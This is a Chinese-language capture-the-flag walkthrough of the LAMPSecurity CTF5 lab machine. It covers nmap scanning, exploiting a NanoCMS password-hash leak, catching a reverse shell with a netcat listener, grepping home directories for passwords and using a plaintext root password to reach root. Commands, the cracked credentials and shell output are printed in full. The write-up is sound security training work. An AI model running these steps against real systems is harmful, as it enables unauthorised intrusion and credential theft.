首页 > 其他分享 >ctf5

ctf5

时间:2023-04-06 14:59:09浏览次数:40  
标签:ctf5 nologin sbin tcp var open bash

CTF5

下载地址:https://download.vulnhub.com/lampsecurity/ctf5.zip

1、主机发现

sudo nmap -sn 192.168.239.0/24
[sudo] de1te 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-04 11:17 CST
Nmap scan report for 192.168.239.1
Host is up (0.00053s latency).
MAC Address: 00:50:56:C0:00:03 (VMware)
Nmap scan report for 192.168.239.136
Host is up (0.00015s latency).
MAC Address: 00:0C:29:6E:D6:7F (VMware)
Nmap scan report for 192.168.239.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:E5:A0:93 (VMware)
Nmap scan report for 192.168.239.129
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 18.92 seconds
                                                                      
  • 靶机地址是136

2、端口扫描

  1. 开放端口扫描

    sudo nmap -min-rate 10000 -p-  192.168.239.136 
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-04 11:18 CST
    Nmap scan report for 192.168.239.136
    Host is up (0.00065s latency).
    Not shown: 65524 closed tcp ports (reset)
    PORT      STATE SERVICE
    22/tcp    open  ssh
    25/tcp    open  smtp
    80/tcp    open  http
    110/tcp   open  pop3
    111/tcp   open  rpcbind
    139/tcp   open  netbios-ssn
    143/tcp   open  imap
    445/tcp   open  microsoft-ds
    901/tcp   open  samba-swat
    3306/tcp  open  mysql
    53344/tcp open  unknown
    MAC Address: 00:0C:29:6E:D6:7F (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 14.54 seconds
    
  2. 查看开放端口的服务与协议

    sudo nmap -sT -sV -O  -p22,25,80,110,111,139,143,445,901,3306,53344 192.168.239.136
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-04 14:14 CST
    Nmap scan report for 192.168.239.136
    Host is up (0.00047s latency).
    
    PORT      STATE SERVICE     VERSION
    22/tcp    open  ssh         OpenSSH 4.7 (protocol 2.0)
    25/tcp    open  smtp?
    80/tcp    open  http        Apache httpd 2.2.6 ((Fedora))
    110/tcp   open  pop3        ipop3d 2006k.101
    111/tcp   open  rpcbind     2-4 (RPC #100000)
    139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
    143/tcp   open  imap        University of Washington IMAP imapd 2006k.396 (time zone: -0400)
    445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
    901/tcp   open  http        Samba SWAT administration server
    3306/tcp  open  mysql       MySQL 5.0.45
    53344/tcp open  status      1 (RPC #100024)
    MAC Address: 00:0C:29:6E:D6:7F (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6
    OS details: Linux 2.6.9 - 2.6.30
    Network Distance: 1 hop
    Service Info: Host: 192.168.239.136
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 175.52 seconds
    
  3. 扫描漏洞

    sudo nmap -script=vuln -p22,25,80,110,111,139,143,445,901,3306,53344 192.168.239.136
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-04 14:19 CST
    Nmap scan report for 192.168.239.136
    Host is up (0.00021s latency).
    
    PORT      STATE SERVICE
    22/tcp    open  ssh
    25/tcp    open  smtp
    80/tcp    open  http
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    | http-slowloris-check: 
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |       
    |     Disclosure date: 2009-09-17
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    |_      http://ha.ckers.org/slowloris/
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    | http-enum: 
    |   /info.php: Possible information file
    |   /phpmyadmin/: phpMyAdmin
    |   /squirrelmail/src/login.php: squirrelmail version 1.4.11-1.fc8
    |   /squirrelmail/images/sm_logo.png: SquirrelMail
    |   /icons/: Potentially interesting folder w/ directory listing
    |_  /inc/: Potentially interesting folder
    |_http-trace: TRACE is enabled
    |_http-csrf: Couldn't find any CSRF vulnerabilities.
    110/tcp   open  pop3
    111/tcp   open  rpcbind
    139/tcp   open  netbios-ssn
    143/tcp   open  imap
    445/tcp   open  microsoft-ds
    901/tcp   open  samba-swat
    3306/tcp  open  mysql
    53344/tcp open  unknown
    MAC Address: 00:0C:29:6E:D6:7F (VMware)
    
    Host script results:
    |_smb-vuln-ms10-061: false
    |_smb-vuln-ms10-054: false
    |_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
    
    Nmap done: 1 IP address (1 host up) scanned in 473.91 seconds
    
    
    • 没啥关键信息

3、web渗透

  1. 浏览网页,尝试渗透

    image

    有page参数,看看是不是文件包含

    image

    感觉是做了限制!!!看一下其他地方吧

    image

    出现了一个CMS,去serachploit 看一下有没有可以利用的漏洞

    searchsploit nanocms                                                                         
    ---------------------------------------------------------------------- ---------------------------------
     Exploit Title                                                        |  Path
    ---------------------------------------------------------------------- ---------------------------------
    NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)            | php/webapps/50997.py
    ---------------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results
    
    • Authenticated看来是需要认证之后才能使用

    Google hack一下,看看有没有NanoCMS的exploit

    image

    上面说这个文件存在密码哈希信息泄露漏洞

    试一下:

    image

    果然,解密一下

    9d2f75377ac0ab991d40c91fd27e52fd:shannon
    

    在cms的login.php尝试登陆一下

    image-20230404150117782

    成功,看看有没有利用的地方

    image

    这个地方好像可以写

    image

    访问内容,并开启监听

    sudo nc -lvnp 443                                                                                    │Thanks to Jonathan Angliss and the SquirrelMail team for a prompt resolution to this vulnerability. In r
    [sudo] de1te 的密码:                                                                                    │egards to the updated files                                                                             
    listening on [any] 443 ...                                                                               │                                                                     
    connect to [192.168.239.129] from (UNKNOWN) [192.168.239.136] 51047                                      │http://www.squirrelmail.org/download.php                                                                
    bash: no job control in this shell                                                                       │                                                                     
    bash-3.2$        
    

4、提权

bash-3.2$ whoami
apache
bash-3.2$ sudo -l
sudo: sorry, you must have a tty to run sudo
bash-3.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
# shadow也看不了
bash-3.2$ cat /etc/shadow
cat: /etc/shadow: Permission denied

  • 权限很低,但是它用户很多。看看有没有敏感文件泄露
grep -f /home "pass" 2>/dev/null -i

/home目录下搜索带有pass的所有文件

/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <title>Root password</title>                                                                                                                    
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <text xml:space="preserve"><note-content version="0.1">Root password                                                                            
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password      
  • 这个地方可能存在问题
bash-3.2$ cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
  <title>Root password</title>
  <text xml:space="preserve"><note-content version="0.1">Root password

Root password

50$cent</note-content></text>
  <last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date>
  <create-date>2012-12-05T07:24:34.3731780-05:00</create-date>
  <cursor-position>15</cursor-position>
  <width>450</width>
  <height>360</height>
  <x>0</x>
  <y>0</y>
  <open-on-startup>False</open-on-startup>

密码50$cent,提权

bash-3.2$ python -c "import pty;pty.spawn('/bin/sh')"                                     
sh-3.2$ su -
su -
Password: 50$cent

[root@localhost ~]# 

定妆照:

[root@localhost ~]# whoami
whoami
root
[root@localhost ~]# id  
id 
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:httpd_t:s0
[root@localhost ~]# sudo -l
sudo -l
User root may run the following commands on this host:
    (ALL) ALL

标签:ctf5,nologin,sbin,tcp,var,open,bash
From: https://www.cnblogs.com/nsqaq/p/17292659.html

相关文章